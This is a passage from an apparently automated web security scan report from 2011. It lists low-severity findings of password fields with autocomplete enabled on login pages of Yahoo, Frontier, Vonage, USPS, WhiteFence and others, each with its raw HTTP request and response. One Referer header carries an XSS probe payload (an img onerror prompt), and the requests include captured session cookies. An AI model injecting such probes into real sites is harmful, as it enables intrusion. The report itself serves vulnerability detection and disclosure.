<td align="left" style="border: 1px solid #ccc; border-top: none; padding: 6px; color: #666;">
<input type="password" tabindex="2" name="pass" style="direction:ltr; width: 250px;" />
</td>
...[SNIP]...

11.3. https://login.yahoo.com/config/login_verify2  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</legend>


<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" id="login_form" onsubmit="return hash2(this)">

<input type="hidden" name=".tries" value="1">
...[SNIP]...
</label>
<input name='passwd' id='passwd' type='password' maxlength='64' tabindex='2'>


</div>
...[SNIP]...

11.4. http://www.aptela.com/my-account/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
</h3>
<form action="https://login.aptela.com/cgi/login.cgi" enctype="application/x-www-form-urlencoded" method="post" name="loginform" onsubmit="return submit_login()"><fieldset>
...[SNIP]...
<br /><input name="sessionToken" size="15" type="password" /> </li>
...[SNIP]...

11.5. http://www.aptela.com/my-account/login-error/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
</p>

<form name="loginform" action="https://login.aptela.com/cgi/login.cgi" method="post" enctype="application/x-www-form-urlencoded" tmt:validate="true" onsubmit="return submit_login()">

<fieldset>
...[SNIP]...
<br /><input type="password" name="sessionToken" size="15" tmt:required="true" tmt:message="You must enter a Password." /> </li>
...[SNIP]...

11.6. https://www.frontier.com/AgentOrdering/Login/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /AgentOrdering/Login/ HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
<td>
            <input name="ctl00$ctl00$FOBasePH$ContentPH$txtPassword" type="password" id="ctl00_ctl00_FOBasePH_ContentPH_txtPassword" class="form-textbox" style="width:130px;" />
            &nbsp;
        </td>
...[SNIP]...

11.7. https://www.frontier.com/AgentOrdering/Login/Default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /AgentOrdering/Login/Default.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Content-Length: 15546
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
<td>
            <input name="ctl00$ctl00$FOBasePH$ContentPH$txtPassword" type="password" id="ctl00_ctl00_FOBasePH_ContentPH_txtPassword" class="form-textbox" style="width:130px;" />
            <span id="ctl00_ctl00_FOBasePH_ContentPH_reqPassword" style="color:Red;">
...[SNIP]...

11.8. https://www.frontier.com/BillPay/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /BillPay/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogIn')" id="aspnetForm">
<div>
...[SNIP]...
<td>
<input name="ctl00$ctl00$FOBasePH$ContentPH$txtPassword" type="password" id="ctl00_ctl00_FOBasePH_ContentPH_txtPassword" tabindex="2" onfocus="document.forms[0].onkeypress = new Function(&quot;return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_btnLogIn');&quot;);" onkeydown="if (event.keyCode==13){document.getElementById('ctl00_ctl00_FOBasePH_ContentPH_btnLogIn').focus();return true;}" style="font-family:Arial;font-size:Small;font-weight:normal;" /><span id="ctl00_ctl00_FOBasePH_ContentPH_reqPassword" style="color:Red;visibility:hidden;">
...[SNIP]...

11.9. https://www.frontier.com/Shop/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Shop/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</div>

<form name="aspnetForm" method="post" action="Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_ctl00_FOBasePH_ContentPH_imbSubmit')" id="aspnetForm">
<div>
...[SNIP]...
</span>
<input name="ctl00$ctl00$FOBasePH$ContentPH$txtVaPin" type="password" maxlength="4" id="ctl00_ctl00_FOBasePH_ContentPH_txtVaPin" style="font-family:Arial;font-size:Small;font-weight:normal;" />
</td>
...[SNIP]...

11.10. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
</div>

       <form data-actions="[
           {
               action: 'validator',
               triggerEvent: 'validate'
           },
           {
               action: 'removeNonVisibleFormFields',
               triggerEvent: 'handleNonVisibleFormFields',
               fieldNamesToSkip: [
                   'login.userName',
                   'login.password',
                   'login.passwordConfirm',
                   'login.securityQuestion',
                   'login.securityAnswer'
               ]
           },
           {
               action: 'createLogin',
               triggerEvent: 'loginCreate'
           },
           {
               action: 'contextualHelp'
           },
           {
               action: 'controller',
               beforeSubmitEvents: [ 'validate', 'handleNonVisibleFormFields', 'loginCreate' ],
               skipApplicationFind: true,
               skipHandleNonVisibleFormFields: true
           }
       ]">


       <fieldset class="textGroup">
...[SNIP]...
</label>
   
                       <input type="password" class="text large" id="password" name="login.password" minlength="6" maxlength="20" />
   
                       <div class="help">
...[SNIP]...
</label>
                       <input type="password" class="text large" id="passwordConfirm" name="login.passwordConfirm" minlength="6" maxlength="20" />
                        <div class="help">
...[SNIP]...

11.11. https://www.usps.com/ContentTemplates/common/scripts/login.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/scripts/login.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ContentTemplates/common/scripts/login.js HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: application/x-javascript
ETag: "585e75ef-155e-0-2242"
Last-Modified: Mon, 01 Aug 2011 20:32:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8770
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

// Define Variables
var isUserLoggedIn = false;
var first;
   
// Get current URL
var currentPage = document.URL;

// Cookie Functions
function createCookie(name,value,days) {
   if (days) {
       v
...[SNIP]...
<div id="login-form-div">'+
           '<form id="login-form" name="loginForm" method="post" action="https://tools.usps.com/go/LoginAction.action">'+
            '<input name="successUrl" value="'+currentPage+'" id="login-form_successUrl" type="hidden">
...[SNIP]...
<span class="input-field"><input class="text" name="password" maxlength="50" id="input-password" type="password"></span>
...[SNIP]...

11.12. http://www.vonage.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?login HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; s_nr=1315328331917-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: vpc=1; expires=Fri, 03-Sep-2021 11:58:56 GMT; path=/; domain=.vonage.com
Set-Cookie: oa_event=1; path=/; domain=.vonage.com
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</h2>
   <form id="logonForm" class="logonForm" target="_top" name="logonForm" method="post" action="https://secure.vonage.com/vonage-web/public/login.htm">


       <div style="font-size:11px" id="usernamebox">
...[SNIP]...
</span><input type="password" style="" name="password" id="password" value="" onfocus="resetInput(this);"/>
       </div>
...[SNIP]...

11.13. http://www.whitefence.com/404.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /404.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /404.html HTTP/1.1
Host: www.whitefence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet23bef%22%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3Eaffc43fb5c2/
Cookie: PHPSESSID=b5g3jlvu9jqg4vvgfhk6r1grh3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:02:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 47389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
...[SNIP]...

11.14. http://www.whitefence.com/category/high-speed-internet/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
...[SNIP]...

11.15. http://www.whitefence.com/category/home-phone/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:54 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
